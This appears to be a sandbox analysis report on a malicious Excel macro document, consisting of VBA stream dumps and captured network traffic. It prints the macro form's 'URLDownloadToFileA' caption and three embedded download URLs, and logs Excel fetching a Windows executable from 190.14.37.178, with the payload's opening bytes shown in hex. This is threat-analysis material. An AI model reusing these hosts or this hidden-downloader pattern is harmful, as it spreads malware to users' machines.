                                    Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37
                                    Stream Path: _VBA_PROJECT_CUR/PROJECTlk, File Type: dBase IV DBT, blocks size 0, block length 17920, next free block index 65537, Stream Size: 30
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/PROJECTlk
                                    File Type:dBase IV DBT, blocks size 0, block length 17920, next free block index 65537
                                    Stream Size:30
                                    Entropy:1.37215976263
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . " E . . . . . . . . . . . . . F . . . . . . . .
                                    Data Raw:01 00 01 00 00 00 22 45 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00
                                    Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 116
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                    File Type:data
                                    Stream Size:116
                                    Entropy:3.43722878834
                                    Base64 Encoded:False
                                    Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 5 . M . o . d . u . l . e . 5 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . . .
                                    Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 35 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 35 00 00 00 55 73 65 72 46 6f 72 6d 32 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 32 00 00 00 00 00
                                    Stream Path: _VBA_PROJECT_CUR/UserForm2/\x1CompObj, File Type: data, Stream Size: 97
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/UserForm2/\x1CompObj
                                    File Type:data
                                    Stream Size:97
                                    Entropy:3.61064918306
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                    Stream Path: _VBA_PROJECT_CUR/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 302
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/UserForm2/\x3VBFrame
                                    File Type:ASCII text, with CRLF line terminators
                                    Stream Size:302
                                    Entropy:4.65399600072
                                    Base64 Encoded:True
                                    Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U R L D o w n l o a d T o F i l e A " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1
                                    Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 32 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c 65 41 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69
                                    Stream Path: _VBA_PROJECT_CUR/UserForm2/f, File Type: data, Stream Size: 226
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/UserForm2/f
                                    File Type:data
                                    Stream Size:226
                                    Entropy:3.01175231218
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . l . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 1 ) . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . 8 . . . . . . . L a b e l 2 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 3 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 4 . . . . . . . . . .
                                    Data Raw:00 04 20 00 08 0c 00 0c 0a 00 00 00 10 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 b4 00 00 00 00 84 01 6c 00 00 28 00 f5 01 00 00 06 00 00 80 07 00 00 00 32 00 00 00 48 00 00 00 00 00 15 00 4c 61 62 65 6c 31 29 00 d4 00 00 00 d4 00 00 00 00 00 28 00 f5 01 00 00 06 00 00 80 08 00 00 00 32 00 00 00 38 00 00 00 01 00 15 00 4c 61 62 65 6c 32
                                    Stream Path: _VBA_PROJECT_CUR/UserForm2/o, File Type: data, Stream Size: 272
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/UserForm2/o
                                    File Type:data
                                    Stream Size:272
                                    Entropy:3.6318384866
                                    Base64 Encoded:True
                                    Data ASCII:. . ( . ( . . . . . . . h t t p : / / 1 9 0 . 1 4 . 3 7 . 1 7 8 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . ( . . . . . . . u R l M o n . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 8 5 . 1 8 3 . 9 6 . 6 7 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 8 5 . 2 5 0 . 1 4 8 . 2 1 3 / . . . . . . . . . . . . . 5 . . . . . . .
                                    Data Raw:00 02 28 00 28 00 00 00 15 00 00 80 68 74 74 70 3a 2f 2f 31 39 30 2e 31 34 2e 33 37 2e 31 37 38 2f 01 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00 00 02 18 00 28 00 00 00 06 00 00 80 75 52 6c 4d 6f 6e 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00
                                    Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4332
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                    File Type:data
                                    Stream Size:4332
                                    Entropy:4.42025024054
                                    Base64 Encoded:False
                                    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                    Data Raw:cc 61 b5 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2461
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
                                    File Type:data
                                    Stream Size:2461
                                    Entropy:3.4974013905
                                    Base64 Encoded:False
                                    Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ P . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . 3 . . d . A
                                    Data Raw:93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 03 00 00 00 00 00 01 00 02 00 03 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
                                    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 138
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
                                    File Type:data
                                    Stream Size:138
                                    Entropy:1.48462480805
                                    Base64 Encoded:False
                                    Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
                                    Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 6a 00 00 00 00 00
                                    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 264
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
                                    File Type:data
                                    Stream Size:264
                                    Entropy:1.9985725068
                                    Base64 Encoded:False
                                    Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . N . . . . . . .
                                    Data Raw:72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 256
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
                                    File Type:data
                                    Stream Size:256
                                    Entropy:1.80540314317
                                    Base64 Encoded:False
                                    Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . a . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                                    Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                    Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 1047
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                    File Type:data
                                    Stream Size:1047
                                    Entropy:6.66117755603
                                    Base64 Encoded:True
                                    Data ASCII:. . . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . . . . H c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D
                                    Data Raw:01 13 b4 80 01 00 04 00 00 00 03 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 e3 04 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 cc 07 a0 48 63 06 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Sep 28, 2021 10:22:19.017812967 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:19.207581997 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:19.207796097 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:19.208677053 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:19.398818970 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:32.754797935 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:32.754837036 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:32.754856110 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:32.754879951 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:32.754904032 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:32.754926920 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:32.754944086 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:32.754965067 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:32.754988909 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:32.754991055 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:32.755011082 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:32.755016088 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:32.755021095 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:32.755023956 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:32.755028009 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:32.755031109 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:32.755069971 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:32.921716928 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:32.943159103 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:32.943205118 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:32.943228960 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:32.943244934 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:32.943332911 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:32.946625948 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:33.094201088 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:33.094238997 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:33.094257116 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:33.094307899 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:33.094331026 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:33.094352007 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:33.094376087 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:33.094378948 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:33.094400883 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:33.094402075 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:33.094427109 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:33.094450951 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:33.094470978 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:33.094507933 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:33.095617056 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:33.095643044 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:33.095647097 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:33.095649958 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:33.095653057 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:33.095655918 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:33.095658064 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:33.124985933 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:33.133980989 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:33.134136915 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:40.600260973 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:40.601831913 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:40.601876020 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:40.602207899 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:40.602221966 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:40.603250980 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:40.603279114 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:40.603302956 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:40.603322983 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:40.603347063 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:40.603369951 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:40.603389978 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:40.603406906 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:40.603415966 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:40.603419065 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:40.603421926 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:40.603424072 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:40.803790092 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:40.803843975 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:40.803859949 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:40.803872108 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:40.804147959 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:40.941112995 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:40.941159010 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:40.941184998 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:40.941210032 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:40.941236019 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:40.941260099 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:40.941283941 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:40.941306114 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:40.941333055 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:40.941358089 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:40.941370010 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:40.941380978 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:40.941395044 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:40.941399097 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:40.941402912 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:40.941405058 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:40.941406012 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:40.941421986 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:40.941443920 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:40.942833900 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:40.991549015 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:40.991705894 CEST4916580192.168.2.22190.14.37.178
                                    Sep 28, 2021 10:22:41.615775108 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:41.615818977 CEST8049165190.14.37.178192.168.2.22
                                    Sep 28, 2021 10:22:41.617984056 CEST8049165190.14.37.178192.168.2.22

                                    HTTP Request Dependency Graph

                                    • 190.14.37.178

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.2249165190.14.37.17880C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    TimestampkBytes transferredDirectionData
                                    Sep 28, 2021 10:22:19.208677053 CEST0OUTGET /44467.4314974537.dat HTTP/1.1
                                    Accept: */*
                                    UA-CPU: AMD64
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Host: 190.14.37.178
                                    Connection: Keep-Alive
                                    Sep 28, 2021 10:22:32.754797935 CEST1INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Tue, 28 Sep 2021 08:22:32 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 387072
                                    Connection: keep-alive
                                    X-Powered-By: PHP/5.4.16
                                    Accept-Ranges: bytes
                                    Expires: 0
                                    Cache-Control: no-cache, no-store, must-revalidate
                                    Content-Disposition: attachment; filename="44467.4314974537.dat"
                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 